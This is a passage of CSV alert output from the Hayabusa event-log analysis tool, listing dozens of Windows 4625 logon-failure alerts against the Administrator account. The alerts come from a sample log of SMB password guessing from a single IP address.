+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IRcppJXDNNfKuvdc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:50:07.343 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E0FoGAIAK2FV3zCJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.393 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uYWIk76XIksgN3sE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.444 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3FEop7o3SOolNvKs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cMGEM3ql9uov7zCP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.520 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EFPUA4pUPaLrkr1I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.551 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b7IeJU89jxitz407 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.590 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wqj9nXRaDpwCJZO3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.631 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bl0d61v2Ux7cNv4r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.663 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8LxTa5lyutrIB2cd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.684 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LPCy11e3YxcCloSH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mj07WKc4aQqPC0Te | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: T2M3v4TsQul5R4sj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I67uBcH52tgLzhVB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.835 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2hsth68FDJ4F10H6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.929 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aDoHrfWlaWZ5GbWV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.972 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uliC5Wd7uZR3fIBc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Unknown Reason,User: Administrator | Type: 3 | Computer: Xhg4hg4XDFaXsJRe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_UnknownError.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
2016-09-20 01:50:08.042 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Unknown Reason,User: Administrator | Type: 3 | Computer: ZrSGxwUyV6gCUPeb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_UnknownError.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.179 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XUBgTr05x3djEYdM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.219 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 40PhGU4ZXu7uihop | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.335 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1DJ9r72hXZH9rEkb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.397 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: khy2BeyBb9wq00f7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.462 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1cDckicL7IMrO7OQ | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.513 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dEEkvfVd3FCap6fa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.545 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JGFSyHQ0ZNWofxzE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ItOZqZSDTrdWpkbp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.611 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NhNdf5lHfrHKSCXq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.646 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xg05F6tdf3kR9kdP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.693 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: 70rRbaC6L6SzT15q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.735 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HnJyN8wF21ff2L1e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.769 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MUZHZJMQznj6GBqg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.804 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: P9h52ZKMbXLuFvUV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.839 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n95RJvcQnFrAG2iX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.883 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xI23nmysFlr1pvVf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:50:08.916 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nVsjcTxDdZbzkmMx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.955 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mMuWatQuNBh9UKdR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.992 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BfC3JZ3awqFDNQbm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.028 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 337h8PHN6Axi0iaY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.071 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qGQpWOuzgETfxTgJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.108 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oFjlyMAJMI2zIC8w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.144 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7exAVz3PlzJQ6Wcw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.183 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RuYihjQpt76foAW3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.219 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OlPm2vRh9EHN9J6n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.255 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n9jDy3NDDPe7XgyW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.291 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AtGxqEKOoP6W3w0Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BLqYztXwV80UBez1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C0yki1dEFZrnMLs2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.420 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jbE2z1W1wQgoTDso | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.455 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IJmZFXFxiLuWWkMC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.500 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x9EPwprgXSJNUFfg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h0ZjYxZ8K5m5F1vo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.587 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xSw7OjDv8ldqbm5T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.631 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mk0BAdOI210HwPhX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.686 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wSwWz57Kvl2XJVUR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DLcfSrHT5bSsNnuQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rQDkbESps0PXWEUT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.797 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZpnyzkXasuyAtdn1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.840 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ps9IqJzTliJvzpIS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.876 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V7PLb2uRTIY8t123 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.921 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sHAJ9p0QbSRxhvtk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.968 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YRiE1wGrwWAx0feP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Flo4bCVjmlaHz0QS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.061 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HscUujSzd3Ua7dqg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aIQPTx67aEer51wb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.191 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MqUoXUf7PKIaoDjs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.222 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wzeB4DAS1W633tmh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.263 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UTtXTrqHoCZMbDLT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.311 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4HVv5PgPhiDW3qcj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g21VoO45UrIbTuZO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.383 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rGpD7AJUTekDmd6Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.423 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OykzTOn7B9THv0cT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.462 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cIYOrBBwX8nFpCzw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.508 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SvnROHLMVnmPfAyy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.547 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5EwJ84H7kXQXzGZz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
